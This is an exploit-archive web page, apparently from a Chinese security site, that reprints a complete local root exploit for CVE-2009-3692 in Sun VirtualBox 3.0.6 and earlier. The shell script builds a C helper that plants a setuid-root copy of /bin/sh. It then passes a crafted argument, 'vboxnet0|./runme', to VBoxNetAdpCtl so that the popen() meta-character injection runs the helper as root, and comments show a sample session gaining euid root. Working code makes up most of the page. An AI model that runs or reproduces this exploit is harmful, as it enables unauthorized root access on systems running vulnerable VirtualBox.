首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
CVE-2009-3692 Sun VirtualBox <= 3.0.6 local root exploit
来源:https://prdelka.blackart.org.uk/ 作者:prdelka 发布时间:2009-10-19  
#!/bin/sh
# CVE-2009-3692 Sun VirtualBox <= 3.0.6 local root exploit 
# ========================================================
# Exploits popen() meta char shell injection vulnerability
# in Sun VirtualBox.
# 
# E.g.
# admin@sundevil:~/test$ id
# uid=101(admin) gid=10(staff) groups=10(staff)
# admin@sundevil:~/test$ uname -a
# SunOS sundevil 5.11 snv_111b i86pc i386 i86pc Solaris
# admin@sundevil:~/test$ ./prdelka-vs-SUN-virtualbox.sh 
# [ Sun VirtualBox <= 3.0.6 OSX/SOL/LINUX local root exploit
# [ No path provided, will attempt to exploit system default
# [ Places a root shell in ./sh if succesful
# [ Detected a SunOS target
# [ Detected SunOS is x86 platform
# ifconfig: add: bad address
# [ Trying for root shell.
# # id
# uid=101(admin) gid=10(staff) euid=0(root) egid=0(root) groups=10(staff)
#
# -- prdelka 
cat >> runme.c << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main(int argc, char* argv[]){
	FILE *from, *to;
	int fd;
	char ch;
	setuid(0);
	setgid(0);
	from = fopen("/bin/sh","rb");
	to = fopen("./sh","wb");
	while(!feof(from)){
		ch = fgetc(from);
		if(!feof(from))
			fputc(ch, to);
	}
	fclose(from);
	fclose(to);
	fd = open("./sh",O_RDWR);
	fchown(fd,0,0);
	fchmod(fd,S_IRWXU|S_IRWXG|S_IRWXO|S_ISUID|S_ISGID);
	close(fd);	
	exit(0);
}
EOF
gcc runme.c -o runme 2>/dev/null
rm -rf runme.c
cat >> exploit.c << EOF
/*
 CVE-2009-3692 VirtualBox VBoxNetAdpCtl Privilege Escalation
 ===========================================================
 Local exploit for the popen() meta character shell injection
 vulnerability that permits a malicious user to obtain root
 privileges on the VirtualBox host machine. This exploit relies
 on the "/bin/sh" binary on the host as being a non-privilege
 dropping shell such as zsh, this is not always the OS default
 setting.
 
 Most modern platforms do not have a /bin/sh that retains 
 privileges by default however Solaris still seems to!

 You can provide an arguement to the VBoxNetAdpCtl binary 
 path or alternatively this exploit detects local host platform
 and runs with common or default installation location.
 */
#include <stdio.h>
#include <stdlib.h>
#include <sys/utsname.h>

int main(int argc,char* argv[])
{
        char *env[] = {NULL};
	int platform, machine = 0;
	struct utsname* sysdetail = malloc(sizeof(struct utsname));
	printf("[ Sun VirtualBox <= 3.0.6 OSX/SOL/LINUX local root exploit\n");
	if(argc > 1){
		printf("[ Trying %s\n", argv[1]);
		execle(argv[1],argv[1],"vboxnet0|./runme","1::2",NULL,env);
		exit(0);
	}
	else{
		printf("[ No path provided, will attempt to exploit system default\n");
	}
 	printf("[ Places a root shell in ./sh if succesful\n");
	uname(sysdetail);
	if(!strncmp("Darwin",sysdetail->sysname,strlen("Darwin")))
		platform = 1;
	if(!strncmp("SunOS",sysdetail->sysname,strlen("SunOS"))) 
		platform = 2; 
	if(!strncmp("Linux",sysdetail->sysname,strlen("Linux"))) 
		platform = 3;
	switch(platform){
		case 1:
			printf("[ Detected a Mac OS X target\n");
			execle("/Applications/VirtualBox.app/Contents/MacOS/VBoxNetAdpCtl","VBoxNetAdpCtl","vboxnet0|./runme","1::2",NULL,env);
			break;
		case 2:
			printf("[ Detected a SunOS target\n");
			if(!strncmp("i86pc",sysdetail->machine,strlen("i86pc"))){
				printf("[ Detected SunOS is x86 platform\n");
				execle("/opt/VirtualBox/i386/VBoxNetAdpCtl","VBoxNetAdpCtl","vboxnet0|./runme","1::2",NULL,env);
			}
			else{
				printf("[ Guessing SunOS is amd64 platform\n");
				execle("/opt/VirtualBox/amd64/VBoxNetAdpCtl","VBoxNetAdpCtl","vboxnet0|./runme","1::2",NULL,env);
			}
			break;
		case 3:
			printf("[ Detected a Linux target\n");
			execle("/opt/VirtualBox/VBoxNetAdpCtl","VBoxNetAdpCtl","vboxnet0|./runme","1::2",NULL,env);
			break;
		default:
			printf("[ Unknown OSE target. Try ./%s <path>/VBoxNetAdpCtl\n",argv[0]);
			break;
	}
        exit(0);
}
EOF
gcc exploit.c -o exploit 2>/dev/null
rm -rf exploit.c
if [ $1 ]
then
        ./exploit $1
else
        ./exploit
fi
echo [ Trying for root shell.
./sh

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Xpdf - Integer overflow which
·HTTPDX h_handlepeer() Function
·MiniShare HTTP Server 1.5.5 Re
·Joomla JD-WordPress remote fil
·Spider Solitaire local crash p
·Millenium MP3 Studio version 2
·EMC RepliStor Server (rep_serv
·Xion Audio Player local buffer
·Websense Email Security Web Ad
·Websense Email Security Cross
·Alleycode HTML Editor 2.21 Loc
·Millenium MP3 Studio version 2
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved